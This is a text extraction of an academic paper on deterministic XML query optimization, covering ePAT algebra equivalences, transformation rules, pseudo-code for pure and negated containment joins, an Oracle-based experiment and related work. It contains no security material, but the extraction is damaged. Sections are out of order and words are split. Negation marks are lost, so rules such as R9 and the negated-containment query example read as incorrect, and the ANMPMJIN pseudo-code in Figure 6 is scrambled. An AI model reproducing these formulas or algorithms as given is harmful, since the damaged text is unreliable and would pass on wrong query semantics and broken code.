ε5 is referred to as the associativity of the containment operations. ε6 embodies both the properties of commutativity and associativity in a single equivalence, thus we coined a new name, cossociativity, to characterize this specific algebraic law in the context of XML. ε7 directly connotes the meaning of the entrance location concept. Similar equivalences hold when all occurrences of ⊃ in ε1, ε2, ε5, and ε6 are substituted by ⊂. Combined application of these algebraic laws with the concepts exclusivity, obligation, and entrance location introduced at the beginning of this section yields more equivalences, which form the basis of our deterministic optimization approach as detailed in (Che et al., 2006).
As ePAT is a set based algebra, a group of equivalences were directly derived from the set-theoretic properties of relevant ePAT operators. A couple of these equivalences are given next (A complete list can be found in Che et al., 2006). ε1. (Ε1 ⊃ Ε2) ∩ Ε3 ⇔ (Ε1 ∩ Ε3) ⊃ Ε2 ε2. (Ε1 ⊃ Ε2) ⊃ Ε3 ⇔ (Ε1 ⊃ Ε3) ⊃ Ε2 Εquivalence ε2 is called the commutativity law of the containment operations.
Equivalences Based on Explicit DTD Constraints
Strategy Overview There are equivalences based on checki ng t he explicit con st r ai nt s a s g iven by the DTD/XSD. Two such examples are given next (symbol τ is used to denote the resultant type of a query expression): ε3. σa,r(E) ⇔ φ if ‘a’ isn’t an attribute of τ(E) ε4. E1 ⊂ E2 ⇔ φ if τ(E1) isn’t contained in τ(E2)
Equivalences Based on Derived Constraints About XML Document Structure This is a far more interesting class of equivalences as they bear the potential of rendering significant improvement on input query expressions. Following are a few samples of these types of equivalences: ε5. (E1 ⊃ E2) ⊃ E3 ⇔ E1 ⊃ (E2 ⊃ E3) if τ(E2) is an EL for τ(E1) and τ(E 3) ε6. (E1 ⊃ E2) ⊃ E3 ⇔ E1 ⊃ (E3 ⊃ E2) if τ(E3) τ(E2) is an EL for τ(E1) and
2064
We identify a large set of potential equivalences as the basis for XML query optimization; these equivalences are centered around the containment operations. However, equivalences are not directly used in our approach for query optimization (this is in contrast to the traditional way such as in Graefe & DeWitt, 1987) where equivalences are directly used for plan enumeration). Instead, we recognize the potential of XML document structure in query optimization and the specific feature of XML queries (i.e., always carrying a structure pattern). We are prompted to focus our attention on the logic-level optimization of XML queries as the first step toward thorough optimization. As such, optimized queries may need be further complemented by a succeeding physical optimizer (cost-based) in case highly optimized query plans are expected (e.g., by those repeatedly running and complex queries). Otherwise, the logical optimizer alone can be used. Therefore, our emphasis is on logical optimization and our approach is designed to extensively explore the rich structure knowledge of XML data to achieve fast XML query optimization.
A Deterministic Approach to XML Query Processing
To obtain the previous goal, we derive heuristic-based, deterministic transformation rules based on the identified equivalence in collaboration with relevant heuristics and the availability of structure indices built in an XML database. These transformation rules are applied to each query (expression) step-by-step, and each performed transformation solidly improves the input query (in terms of evaluation efficiently) until no more transformations can be performed. During this process, transformation rules are arranged in a certain order according to well-established optimization heuristics. When there are multiple rules applicable to an input expression, the precedence is always given to the first applicable rule. The details of our rule control strategy and the transformation algorithms can be found in Che (2005) and Che et al. (2006). In this article, we limit our discussion to the optimization issue of query expressions involving only the main ePAT operators: etn, ∩, ∪, −, σ, ⊃, ⊂. Logical optimization in this work consists of three consecutive transformation phases: normalization, semantic optimization, and simplification (clean up). The normalization phase enforces straightforward DTD/XSD constraints, performs straightforward simplification, and reorders operators in the following order (from bottom up): etn, ∩, −, σ, ⊃, ⊂ , ∪. It is interesting to note that, after this phase, all ∩ and − operations sediment to the bottom on the operation tree and get ultimately eliminated from the query expressions after applying dedicated transformation rules. The second phase, semantic optimization, starts with a normalized ePAT expression, explores deep structure knowledge of XML data in order to render an application of a potential structure index into the query. Due to the particular pattern that a query expression may be in, structure indices, although available, may not be applicable to the query. The central goal of the second phase is to reveal such opportunities.
The third phase performs a thorough cleaning-up. For this purpose, an intensive set of simplification rules are needed, including rules specially added for handling the possible redundancy that might be rendered by the second (main) phase. A key feature of our approach is that deterministic transformations are exclusively applied to all queries at all three phases to achieve quick optimization. Consequently, a typical problem of all rule-based systems—uncontrollable runtime behavior—is expediently circumvented. A second important feature is that after thorough transformation of an input query for optimization, the ∩ and − operations eventually get eliminated. This once again brings enhanced performance to the optimization itself and to the optimized queries.
DETERMINISTIC XML QUERY OPTIMIZATION This section presents selected transformation rules and addresses the heuristics behind these rules.
Normalization The normalization phase has three main tasks: enforcing simple DTD-constraints, reordering the operators (to facilitate semantic optimization at the second phase), and performing straightforward simplification.
Enforcing Explicit DTD-Constraints We do not assign this task to the query parser because we do not generally assume the existence of database schemas in the contest of XML due to the semi-structured nature of XML data. This group of rules checks the queries’ consistency with the explicit constraints induced by a given DTD/XSD (if anny). A couple of example rules are given below:
2065
A Deterministic Approach to XML Query Processing
R1. σa,r (E) ⇒ φ if ‘a’ is not an attribute of τ(E) R2. E1 ⊂ E2 ⇒ φ if τ(E1) is not contained in τ(E2)
Operator Reordering The goal of this group of rules is to completely eliminate the ∩ and – operations from a query, and re-permute the remaining operators in the following order: etn and σ at the bottom, ⊃ and ⊂ in the middle, ∪ on the top, in order to facilitate the subsequent semantic optimization phase to achieve the primary goal – bringing a beneficial structure index into a query if possible. Several example rules are given next: R3. σ(E1 ∪ E2) ⇒ σ(E1) ∪ σ(E2) R4. E1 − (E2 ⊃ E3) ⇒ E1 ∩ (E2 ⊃ E3) R5. (E1 ⊃ E2) ∩ E3 ⇒ (E1 ∩ E3) ⊃ E2 R6. E ∩ E ⇒ E R7. σ(E1 ⊃ E2) ⇒ σ(E1) ⊃ E2 R8. (E1 ⊃ E2) ⊃ E2 ⇒ E1 ⊃ E2 R9. −σ(E) ⇒ σ(E) R10. − (E1 ⊃ E2) ⇒ E1 ⊃ E2 Successful application of R5 makes it possible for R6 to eliminate an occurrence of the ∩ operator. The binary “−” operator is dealt in a similar way. The unary “−” operation (which negates a selection or a containment) is eliminated in a different way: R9 and R10 absorb the negation into the subsequent selection or containment operation (for convenience presentation, in these rules “⊃” is used to denote the directly negated form of ⊃, and “σ” represents the negated form of σ). Ideally, specialized join algorithms for ⊃ will be provided for direct and efficient implementation of the operation, while σ is easily handled by simply interpreting the negation as negating the selection operator’s filtering predicate. The above discussion similarly applies to the ⊂ operator (i.e., by working with the counterparts of rule R4, R5, R7, R8, and R10 after ⊃ is replaced by ⊂ in these rules).
2066
Straightforward Simplification We observe that most of the simplification carried out at an early stage are beneficial, e.g., E ⊂ E ⇒ E, while some less straightforward simplification if hastily done at a too early stage may cause the whole optimization process to be quickly captured at a local optimal. For example, while a leftward application of ε7 eliminates E3, it takes away the opportunity of applying the structure index between τ(E3) and τ(E2) if such a structure index is indeed available, or later on, a reverse transformation has to be called upon to restore the lost opportunity. Therefore, at the normalization phase we only pursue straightforward simplification, and the simplification rules mostly are only related to the set operations. We furnish a couple of such rules for simplification in the following. R11. σ(E) ∪ E ⇒ E R12. (E1 ⊃ E2 ∪ E1) ⇒ E1 A counterpart of R12 analogously works with the ⊂ operation.
Semantic Optimization The second phase, semantic optimization, is the core in our optimization approach. The primary goal of this phase is to discover potential opportunities of applying structure indices to a query. Three situations have been identified for this purpose: •
•
A structure index is available for a ⊃ or ⊂ operation in an input expression and the index is then simply applied. This is by far the most favorable situation. A structure index is available but is not superficially applicable because of an unfavorable pattern that the query expression is in. However, after desired transformations are performed, the index becomes applicable and used.
A Deterministic Approach to XML Query Processing
•
No relevant structure index is available, but a after introducing a third element type as an entrance location into a query, a previously irrelevant index becomes relevant and eventually gets applied.
In summary, the first situation applies a structure index effortlessly, the second situation makes an “inapplicable” index applicable, and the third situation makes an “irrelevant” index relevant and applied. In the following, we present sample rules that exploit the usage of structure indexes corresponding to each of these situations: 1.
Applying readily available structure indices: For an input (sub)query of form “E1 ⊃ E2”, if a structure index between the two involved element types, τ(E1) and τ(E2), happens to be available, our strategy firmly grasp this opportunity and applies the index by invoking the following transformation rule (where the parameter τ(E1), appearing as a subscript of the index operator I , indicates the resultant type of the index operation; a similar rule holds for ⊂).
R13. (E1 ⊃ E2) ⇒ (Iτ(E1)(E2) ∩ E1) if a structure index is available between τ(E1) and τ(E2) 2.
Making an “inapplicable” structure index applicable: There are chances that a relevant structure index is available but not applicable because of the particular pattern that a query expression is in. Nevertheless, the applicability of the structure index to the query can enabled by desired transformations rendered by the commutativity and/or associativity laws w.r.t. ⊃ and ⊂ in the ePAT algebra. Specifically, the following transformation rules can be used (note the counterparts of R14 and R15 analogously work for ⊂):
R14. (E1 ⊃ (E2 ⊃ E3)) ⇒ ((E1 ⊃ E2) ⊃ E3) if there exists a structure index between τ(E1) and τ(E2), and τ(E2) is an EL for τ(E1) and τ(E3) R15. (E1 ⊃ (E2 ⊃ E3)) ⇒ ((E1 ⊃ E3) ⊃ E2) if there exists a structure index between τ(E1) and τ(E3), and τ(E2) is an EL for τ(E1) and τ(E3) R16. (E1 ⊂ (E2 ⊃ E3)) ⇒ ((E1 ⊂ E2) ⊃ E3) if there exists a structure index between τ(E1) and τ(E2), and τ(E1) is an EL for τ(E2) and τ(E3) R17. (E1 ⊃ (E2 ⊂ E3)) ⇒ ((E1 ⊃ E2) ⊂ E3) if there exists a structure index between τ(E1) and τ(E2), and τ(E1) is an EL for τ(E2) and τ(E3) These rules are a result of a guided application of the equivalences that relate to the entrance location notion. A comprehensive list of the rules can be found in Che et al. (2006). 3.
Making “irrelevant” structure indexes relevant and applicable: For an input query, if there is no structure index found relevant, our approach checks whether it is possible to make a related index relevant by introducing an entrance location (a new element type) into the query (a related index is one that relates to just one of the involved element types, and thus is not quite relevant). To explore this kind of opportunities, we need specialized (and more complex) transformation rules that check specific structural properties (e.g., those connoted by the exclusivity and/or obligation notions, in addition). Our approach examines numerous cases, from most beneficial to least favorable in a heuristic point of view, in order to achieve the previous goal. In many of these cases, element type substitution is performed so that an opportunity of bringing a potential structure index into a query is discovered. After a desired transformation is performed,
2067
A Deterministic Approach to XML Query Processing
R13 is then called during the next iteration to secure the application of an identified potential structure index. The transformation rules corresponding to the four most favorable cases were identified in our prior work (Che et al., 2006) are presented next: R18. (E1 ⊂ E2) ⇒ (E1 ⊂ E3) if E3 is an EL for τ(E1) and τ(E2) and is exclusively contained in τ(E2), free(E2), and a structure index between τ(E3) and τ(E1) is available R19. (E1 ⊃ E2) ⇒ (E1 ⊃ E3) if E3 is an EL for τ(E1) and τ(E2) and obligatorily contains τ(E2), free(E2), and a structure index between τ(E3) and τ(E1) is available R20. (E1 ⊂ E2) ⇒ (E1 ⊂ E3) if τ(E2) is an EL for τ(E1) and τ(E3) and is exclusively contained in τ(E3), free(E2), and a structure index between τ(E3) and τ(E1) is available R21. (E1 ⊃ E2) ⇒ (E1 ⊃ E3) if τ(E2) is an EL for τ(E1) and τ(E3) and obligatorily contains τ(E3), free(E2), and a structure index between τ(E3) and τ(E1) is available In the previous rules, the free(E) condition is used to denote that the evaluation of the expression E is required to return the full extent of type τ(E). free(E) trivially holds for every etn, which is the primary intended use of this predicate. With nontrivial expression E (i.e., a non etn expression), database statistics can be used to quickly determine whether the predicate holds without physically accessing the database. If introducing a structure index into a query is impossible, our approach switches to a less favorite choice—that is, merely reducing the navigation paths required by a query. This kind of rules are relatively less interesting, especially when efficient structural join algorithms (e.g., Chien, Vagena, Zhang, Tsotras, & Zaniolo, 2002; Srivastava et al., 2002) are available for implementing the general containment operations. It is worth to mention that there may exist alternatives to the new element type E3 inter-
2068
polated by the previous rules into a query (as an entrance location). In order to retain our framework deterministic under all circumstances, we developed an algorithm that searches the optimal entrance location for these rules. This algorithm is discussed in detail in Che et al. (2006).
Simplification The third phase, simplification, re-invokes most of the simplification rules covered by Phase 1. This is necessary because, after major transformations being performed for semantic optimization (the second phase), new redundancies may be introduced, especially when new element types (as entrance locations) are interpolated. The rules that enforce DTD-constraints and reorder operators do not need to be called again as semantic optimization does not introduce new inconsistencies with the DTD-constraints nor causes major structural changes in the queries. Besides, at this point we expect a thorough clean up on the optimized queries, and for this purpose, we add two new types of rules to the third phase. Firstly, the following rules are added to remove the ∩ operations that may be reintroduced together with a structure index operation: R22. (Iτ(E1)(E2) ∩ E1) ⇒ (Iτ(E1)(E2)) if free(E1) R23. (I τ(E1)(E2) ∩ σ(E1)) ⇒ σ(I τ(E1)(E2)) if free(E1) Secondly, toward thorough clean up, we add the following rules that carry out deep clean up by exploiting relevant structure knowledge (as characterized by the three notions: exclusivity, obligation, and entrance location). A few such rules as examples are given next: R24. E1 ⊂ E2 ⇒ E1 if τ(E1) is exclusively contained in τ(E2) R25. (E1 ⊂ (E3 ⊂ E2)) ⇒ (E1 ⊂ E2) if τ(E3) is an EL for τ(E1) and τ(E2), and free(E3) R26. (E1 ⊂ (E3 ⊃ E2)) ⇒ (E1 ⊃ E2) if τ(E1) is
A Deterministic Approach to XML Query Processing
an EL for τ(E3) and τ(E2) and obligatorily contained in τ(E3), and free(E3)
An Optimization Example In the following, we show the transformations applied to the example query introduced in the third section: (keyword ⊂ (description ⊂ (open_auction ⊃ σa=‘personref, r=‘123’ (bidder)))) ⇒ (by R14, i.e., ⊂ associativity) ((keyword ⊂ description) ⊂ (open_auction ⊃ σa=‘personref, r=‘123’ (bidder))) ⇒ ( by R15, i.e., ⊂ c o m mu t a t iv it y) ((keyword ⊂ (open_auction ⊃ σa=‘personref, r=‘123’ (bidder))) ⊂ description) ⇒ (by R13, i.e., index introduction) ((Ikeyword(open_auction ⊃ σa=‘personref, r=‘123’ (bidder)) ∩ keyword) ⊂ description) ⇒ (by R22: ∩ deletion) ((Ikeyword(open_auction ⊃ σa=‘personref, r=‘123’ (bidder))) ⊂ description) ⇒ (by R23: simplification based on exclusivity) (I keyword(open_auction ⊃ σa=‘personref, r=‘123’ (bidder))) The performed transformations eventually make the structure index Ikeyword(open _ auction) interpolated and applied, and have the element type description completely removed from the query because of the identified exclusive containment property between keyword and description. As a result, the query expression (a logical plan) is considerably improved because the original form involves three containment operations, while the optimized one has only one containment operation plus a structure index. Without first performing the accomplished transformations, the structure index between open _ auction and keyword, although available and relevant, would not be eventually applied to this query.
SUPPORT FOR PURE AND NEGATED CONTAINMENTS While structural joins (Srivastava et al., 2002; Zhang et al., 2001) have been widely recognized as important primitives for evaluating the containment operations that are at the core of XML queries, there are aspects of containment operations that necessitate specialized algorithms. This important issue however, does not seem to receive sufficient attentions from other researchers. Pure and negated containments represent two special but important cases of containment operations. Structural joins are proper for the situation when both operands are required for output or for serving a subsequent operation during query evaluation. Nevertheless, this does not cover all the cases that the structural relationships (typically via containment operations) need to be involved in an XML query. A rather common situation is when a query (or a sub-query) simply asks for qualified elements from one operand, for example, “find all the items listed in Australia,” assuming the XMark dataset (Schmidt et al., 2002) is used. This query can be formatted as the following ePAT expression: item ⊂ Australia. This query involves a pure containment operation that needs to return only the elements from the first operand, while the second operand in this query is used only to help screen the elements from the first operand. This query, as consisting of a pure containment operation, is thus referred to as a pure containment query. If, instead, a general structural join as defined in Srivastava et al. (2002) and Zhang et al. (2001) is used for answering this query, the query plan shall consist of the following three nontrivial steps: performing the structural join, projecting the result to the left operand, and eliminating duplicates from result set. Alternatively, if the query engine calls for a specialized algorithm that directly computes the pure containment semantics of ⊂ as defined in ePAT (see the last section), the evaluation plan
2069
A Deterministic Approach to XML Query Processing
of this query then comprises just a single evaluation step (i.e., the invocation of this specialized containment algorithm, which may also be called a pure containment join or containment join for short). Now, an arising question is will this single algorithm be more efficient than the previous three-step evaluation plan? The answer is an absolute yes, in fact, this pure containment join
is much cheaper than a corresponding structural join alone, not to mention the other two extra steps required by the first plan that uses a general structural join. Containment joins come in two different forms. In our work, the one that computes ⊂ is called ICJoin (the “Is-Contained” Join), and the one that computes ⊃ is called CJoin (the “Contains”
Figure 2. The ICJoin algorithm calculating “D⊂A” Algorithm ICJoin (DList, AList) /* the algorithm computes the result of “D⊂A” */ input: DList of type D, and AList of type A; both in sorted order of startPos and all elements having the same docId output: OList holding a sub list of DList that satisfy “D⊂A” begin 1. a = AList->firstNode; OList = NULL; 2. for (d = DList -> firstNode; d != NULL; d =d -> nextNode) { 3.
while (a.end < d.end && a->hasNextNode()) a = a->nextNode;
4.
/* Now find the first possible descendant d of node a: */
5.
if (a.begin < d.begin && a.end > d.end) add d to OList
6. } /* end of for loop */ end
Figure 3. The CJoin algorithm calculating “A⊃D”
Algorithm CJoin (AList, DList) /* the algorithm computes the result of “A⊃D” */ input: AList of type A, and DList of type D; both in sorted order of startPos and all elements having the same docId output: OList holding a sub list of AList that satisfy “A⊃D” begin 1. d = DList->firstNode; OList = NULL; 2. for (a = AList -> firstNode; a != NULL; a = a -> nextNode) { 3. while (d.begin < a.begin && d->hasNextNode()) d = d->nextNode; 4. /* find the first possible descendant d of node a */ 5. if (a.end > d.end && a.begin < d.begin) add a to OList 6. } /* end of for loop */ end
2070
A Deterministic Approach to XML Query Processing
Join). The pseudo code of the two algorithms are respectively given in Figures 2 and 3. In these algorithms, we adopt the same numbering scheme for elements as in Srivastava et al. (2002) (i.e., DocId, StartPos : EndPos, LevelNum), which
uniquely encodes the doc-id, the start and end position of an element, and the nesting level of the element in the DOM tree of the source document. With both algorithms, the AList (a list of potential ancestors) and DList (a list of potential
Figure 4. The NICJoin algorithm calculating “D ⊂ A” Algorithm NICJoin (DList, AList) /* the algorithm computes the result of “D ⊂ A” */ input: DList of type D, and AList of type A; both in sorted order of startPos and all elements having the same docId output: OList holding a sub list of DList that satisfy “D ⊂ A” begin 0. OList = DList; 1. a = AList->firstNode; OList = NULL; 2. for (d = DList -> firstNode; d != NULL; d =d -> nextNode) { 3.
while (a.end < d.end && a->hasNextNode()) a = a->nextNode;
4.
/* Now find the first possible descendant d of node a: */
5.
if (a.begin < d.begin && a.end > d.end) remove d from OList
6. } /* end of for loop */ end
Figure 5. The NCJoin algorithm calculating “A ⊃ D” Algorithm NCJoin (AList, DList) /* the algorithm computes the result of “A ⊃ D” */ input: AList of type A, and DList of type D; both in sorted order of startPos and all elements having the same docId output: OList holding a sub list of AList that satisfy “A ⊃ D” begin 0. OList = AList; 1. d = DList->firstNode; OList = NULL; 2. for (a = AList -> firstNode; a != NULL; a = a -> nextNode) { 3.
while (d.begin < a.begin && d->hasNextNode()) d = d->nextNode;
4.
/* find the first possible descendant d of node a */
5.
If (a.end > d.end && a.begin < d.begin) remove a from OList
6. } /* end of for loop */ end
2071
A Deterministic Approach to XML Query Processing
Figure 6. ANMPMJIN: A straightforward counterpart of MPMGIN for negated containments Algorithm ANMPMJIN (list1, list2) begin 1. copy list1 to list3 2. set cursor1 at beginning of list1 3. set cursor2 at beginning of list2 4. set cursor3 at beginning of list3 5. while (cursor1 != end of list1 and 6.
cursor2 != end of list2) do
7.
if (cursor1.docno < cursor2.docno) then cursor1++; cursor3++
8. 9.
else if (cursor2.docno < cursor1.docno) then
10. 11.
cursor2++ else
12.
mark = cursor2
13.
while (cursor2.position < cursor1.position
14.
cursor2 != end of list2) do
15.
cursor2++
16.
if (cursor2 == end of list2) then
17.
cursor1++; cursor3++
18.
cursor2 = mark else if (cursor1.val (directly)contains
19. 20.
remove cursor0.val
21.
cursor1++
24.
cursor2.val)
then
endif
22. 23.
and
endwhile endif
25. endwhile 26. output list3 end
descendents) are scanned just once, and there is no need to use any stacks or queues (this is in contrast to the tree-merge and stack-tree algorithms presented in Srivastava et al. (2002). Both algorithms have the time complexity of Θ(|AList| + |DList|), while all the structural join algorithms proposed in the papers (Srivastava et al., 2002; Zhang et al., 2001) have the complexity of O(|AList| + |DList| + |OutputList|), where |Out-
2072
putList| alone can be the scale of |AList| * |DList|, which is far larger than |AList| + |DList|. The performance advantage of the pure containment joins over general structural joins thus becomes obvious. This superiority gets further amplified when the extra operations (which may be required if a general structural join is used instead) are taken into account, as illustrated by the example given at the beginning of this section.
A Deterministic Approach to XML Query Processing
From our specialized containment join algorithms (see Figures 2 and 3), we further derive the negated counterparts for the operations ⊂ and ⊃, respectively. These two algorithms are shown in Figures 4 and 5, correspondingly. As can be seen, NICJoin and NCJoin both reverse the logic of their non-negated counterparts. That is, for example, whenever a qualified descendant is identified by ICJoin, it is excluded from output by NICJoin. NICJoin and NCJoin share the same time complexity as their counterparts. Applying negated containment joins to negated containment queries (i.e., queries involving negated containments like the example that is to be addressed at the end of this section) is yet another persuasive case demonstrating the advantage of resorting to specialized containment joins. In Che (2005), two alternative algorithms (i.e., NMPMJIN and NSTD) for computing negated containments were presented that are based on direct modification on the two well-known structural join algorithms, MPMJIN in Zhang et al. (2001) and Stack-Tree-Desc in Srivastava et al. (2002), respectively. NMPMJIN and NSTD were aligned to the same style and numbering scheme adopted by Stack-Tree-Desc. In the following, we present an alternated version of NMPMJIN (Che, 2005), which is straightforwardly revised from MPMJIN for ease of comparison. We refer to this algorithm as ANMPMJIN. ANMPMJIN is the algorithm that we implemented in our test-bed and for the experimental study to be reported in Section 6 (and MPMJIN is the counterpart structural join algorithm adopted by our test-bed). ANMPMJIN follows exactly the same logic as MPMGIN (Zhang et al., 2001). It accepts two sorted lists of items as input and outputs a list of items (usually a sub list of the first input list) that do not have a containment relationship with any item from the second input list. ANMPMJIN has two levels of nested loops (while MPMGIN has three). The worst-case time complexity of ANMPMJIN is O(n2) (comparing with O(n3) of the original MPMGIN).
Finally, we look at an example query that has a negated containment operation – a so-called negated containment query. Assume this query asks for open _ auctions that have not received a bid, which is formatted as “open_auction − (open_auction ⊃ bidder).” A reasonable plan (an ePAT expression) for this query is “open_auction − πopen_auction (open_auction ×⊃ bidder),” which means a structural join algorithm (e.g., MPMGIN, is to be called first for computing the operation ×⊃;) then a leftward projection is invoked for computing πopen_auction; after that, duplicates are eliminated, and finally the difference is computed. This plan consists of four steps. A much better alternative plan is “open_auction ⊃ bidder,” assuming dedicated algorithm like ANMPMJIN for computing the “⊃” operation is implemented. The superiority of the second plan is obvious if we consider that ⊃ is the only operation needs and its implementation (e.g., ANMPMJIN) is more efficient than MPMGIN alone (O(n2) vs. O(n3)), not to mention the other three extra operations remained in the first evaluation plan, which all come with a nontrivial cost.
EXPERIMENTS In order to evaluate our new optimization approach that has integrated support for pure and negated containments, we conducted an experimental study. As our new approach is adapted from the deterministic optimization approach, we presented previously in Che et al. (2006), and the effectiveness, efficiency, and scalability of the general approach has been inherited. Herein, we only show the performance advantage of this newly adapted approach as compared with the prior version of the approach (Che et al., 2006). Our prototype system is implemented in the Java programming language and the Oracle RDBMS is used as a fast platform for storage management (however, our optimization approach is platform independent per se). Query processing in our test-bed consists of the following steps:
2073
A Deterministic Approach to XML Query Processing
translation from XQuery to ePAT expressions, logical optimization performed on ePAT expressions, translation from optimized ePAT expressions to Oracle SQL, and SQL query execution by Oracle query engine. Our test-bed is set in a typical client/server database environment. The client side runs Oracle SQL*Plus (Release 8.1.6.0.0) on Window XP Pro, and the CPU is a Celeron processor of 500MHZ with 192MB RAM. The server side runs an Oracle8i Enterprise Edition (Release 8.1.6.0.0) database server, installed on Sun Ultra 5 with an UltraSparc-II CPU of 333MHZ and a RAM of 512MB. For this test, the benchmark databases and queries are the same as in Che et al. (2006). Here we present the result of our test with only Database 1, which is a synthesized one based on a rather practical DTD (Che et al., 2006) for conference proceedings. The characteristics of this database are shown in Table 1 (The database
was populated at different scales; Table 1 shows the statistics at the representative scales, 1, 5, and 10). The benchmark queries and their selectivities are shown in Table 2. The performance data (obtained when the database was populated at scale 10) are illustrated in Figure 7. From Figure 7, one can see that the new approach with dedicated support for pure and negated containments outperform the old approach by several times. This is true for both optimized and non-optimized queries. This observation further means that the performance gain of the new approach is mainly from the contribution of the specialized containment join algorithms integrated within the new approach; these specialized algorithms (as additional primitives) can be broadly and separately applied to other XML querying systems. Finally, before concluding this section, we would like to point out: analytically, we believe ICJoin and CJoin (and their negated counterparts,
Table 1. Characteristics of database 1 at scale 1, 5, and 10 (cardn. stands for cardinality) Scale
Size (MB)
#Docs
#Elements
Max degree
Min degree
Depth
Max cardn.
Min cardn.
1
28.93
100
1,206,221
20
1
6
421,681
100
5
138.80
500
5,763,581
20
1
6
2,125,564
500
10
252.40
1000
11, 546, 873
20
1
6
3, 695,219
1000
Table 2. Database 1 benchmark queries and properties (the select column indicates the selectivity of queries and the optimize column records the optimization time in seconds)
2074
Queries (formatted in XPath)
Select
Optimize
Q1
// Article[./ Title ft contains "Data Warehouseing" or ./ Keywords ft contaions "Data Warehousing"]
2.0%
0.192
Q2
// Article[./Title ft contaions "Data Warehousing"]/Abstract
1.1%
0.153
Q3
// Article[./ Title ft contains "Data Warehouseing"]/ Sections/ Section [@title= "Introduction"]/ Paragraph
6.4%
0.769
Q4
//Article[.// Surname ft contains "Aberer"]
2.3%
0.737
Q5
//Section/Paragraph [@title = "Summary"]
1.8%
0.841
Q6
// (article Short Paper)// Paragraph[.ftcontains "Multidimension" or .ftcontain "OLAP"]
1.1%
2.221
A Deterministic Approach to XML Query Processing
NICJoin and CJoin) shall bring more improvement on the query performance because they all have a linear time complexity as shown in the last section (at this time our experiment is based on ANMPMJIN and NMPMJIN only).
view. In Chung and Kim (2002), a fresh idea about using the DTD of XML documents to guide the query processor’s behavior was proposed, where, the same type of elements (corresponding to the same node in the DTD-graph) is further classified according to the diverging paths from the type node. Query processing is then guided to a more specific class of the elements of this type to prune the search space. This classification information can effectively guide the query engine to narrow the search space and speed up query evaluation. But with relatively complex DTD, too many classes may be produced. In Wang and Liu (2003), based on the notion of rooted paths, two types of optimization were proposed: path complementing (i.e., if the path in a path query has a complement and its evaluation is cheaper, then the complement substitutes for the original path) and path shortening (i.e., if the head segment of a path is the unique one that reaches the ending point of the segment, then this segment is removed). The path shortening idea is similar to ours (Che, 2005; Che et al., 2006). However, our algorithm is more general and may identify more opportunities of reducing a path (which in our approach does not need to be rooted). In Buneman, Fan, and Weinstein (1999), path constraints were used to convey the semantics of semi-structured
RELATED WORK Now we briefly review some related work. Lore (McHugh, Abiteboul, Goldman, Quass, & Widom, 1997; McHugh & Widom, 1999) is a DBMS originally designed for semi-structured data and later migrated to XML-based data model. The Lore optimizer is cost-based and does not perform logic-level optimization. The work in Consens and Milo (1994) is one of the early works reported on using the DTD knowledge on query transformations. The DTDs considered there are much simpler than that of XML. In Fernandez and Suciu (1998), a comparable strategy for exploiting a grammar specification for query optimization over semi-structured data is studied. In that study, efforts were made on how to make a complete use of the available grammar to expand a query. Our focus is different—we identify transformations that introduce “guaranteed” improvements on query expressions from a heuristic point of
Execution time (in milliseconds)
Figure 7. Performance comparison: new approach with special containment join support vs. previous approach without special support (Opt, Non-opt, OptN, and Non-optN stand for optimized and nonoptimized queries in regard to our previous and new adapted approach, respectively) 10000 9000 8000 7000
Non-optN OptN Non-opt
6000 5000
Opt
4000 3000 2000 1000 0 Q1
Q2
Q3
Q4
Q5
Q6
Queries
2075
A Deterministic Approach to XML Query Processing
data and applied to query optimization. It is worth noticing that there are two types of semantics with regard to XML data: data semantics (i.e., the meanings of the data) and structure semantics (i.e., the knowledge about the general structure or structural relationships among the data elements). The path constraints investigated in Buneman et al. (1999) is restricted to only data semantics. Our approach exploits structural semantics. Path and tree pattern matching build the core of XML query processing. A bundle of approaches (Bremer & Gertz, 2003; Grust, 2002; Li & Moon, 2001; Srivastava et al., 2002; Zhang et al., 2001) have been proposed for supporting path and tree pattern matching, commonly known as structural joins. These approaches focus on composing the path/tree query patterns node-by-node through pair-wise matching of ancestor and descendant or parent and child nodes. These approaches have performance advantages over the simple path navigation method and have been integrated with our deterministic optimization approach in our prototype implementation. Distinctively, we provide direct support for pure and negated containments (which are common in XML queries), and developed a family of specialized supporting algorithms, which showed performance potential. To the best of our knowledge, our work as reported in Che et al. (2006) and in this article is the only one that uses algebraic transformations extensively to exploit structural properties and other important optimization heuristics for XML query optimization, and our work is the only one that integrates special containment join algorithms with a deterministic optimization approach.
SUMMARY In this article, we presented an innovative, logiclevel optimization approach, which is particularly adapted for dealing with XML queries that may contain special containments such as pure and
2076
negated containments. Regular structural join algorithms cannot be efficiently applied to these kind of queries. The uniqueness of our work lies in, first, we applied a deterministic approach for XML query optimization, which shows great potential for improved optimization performance; second, we proposed dedicated algorithms for special containment operations (i.e., pure and negated containments) in the context of XML query processing. Our experimental study confirmed the validness and performance advantage of the presented new approach and the proposed special containment join algorithms.
REFERENCES Böhm, K., Aberer, K., Özsu, T. M., & Gayer, K. (1998). Query optimization for structured documents based on knowledge on the document type definition. In Proceedings of IEEE International Forum on Research and Technology Advances in Digital Libraries (ADL’98) (pp. 196-205), Santa Barbara, California, April 22-24, 1998. Böhm, K., Aberer, K., Neuhold, E. J., & Yang, X. (1997). Structured document storage and re?ned declarative and navigational access mechanisms in HyperStorM. The VLDB Journal, 6(4), 296-311. Boag, S., Chamberlin, D., Fernandez, M. F., Florescu, D., Robie, J., & Simeon, J. (2006). XQuery 1.0: An XML query language. Retrieved from http://www.w3.org/TR/xquery/ Bremer, J. M., & Gertz, M. (2003). An efficient XML node identification and indexing scheme. University of California at Davis. Technical Report, 2003 (http://www.db.cs.ucdavis.edu/papers/TR CSE-2003-04 BremerGertz.pdf). Buneman, P., Fan, W., & Weinstein, S. (1999). Query optimization for semistructured data using path constraints in a deterministic data model. In Proceedings of DBPL Conference (pp. 208-223).
A Deterministic Approach to XML Query Processing
Chan, C. Y., Felber, P., Garofalakis, M., & Rastogi, R. (2002). Efficient filtering of XML documents with XPath expressions. In Proceedings of the International Conference on Data Engineering (pp. 235-244), San Jose, California, February 2002. Chan, C. Y., Garofalakis, M. N., & Rastogi, R. (2002). RE-Tree: An efficient index structure for regular expressions. In Proceedings of VLDB Conference (pp. 263-274), Hong Kong, China, 2002.
Consens, M., & Milo, T. (1994). Optimizing queries on files. In Proceedings of ACM SIGMOD International Conference on Management of Data (pp. 301-312), Minneapolis, Minnesota, May 1994. Fernandez, M. F., & Suciu, D. (1998). Optimizing regular path expressions using graph schemas. In Proceedings of the 14th International Conference on Data Engineering (pp. 14-23), Orlando, Florida, USA, February 23-27, 1998.
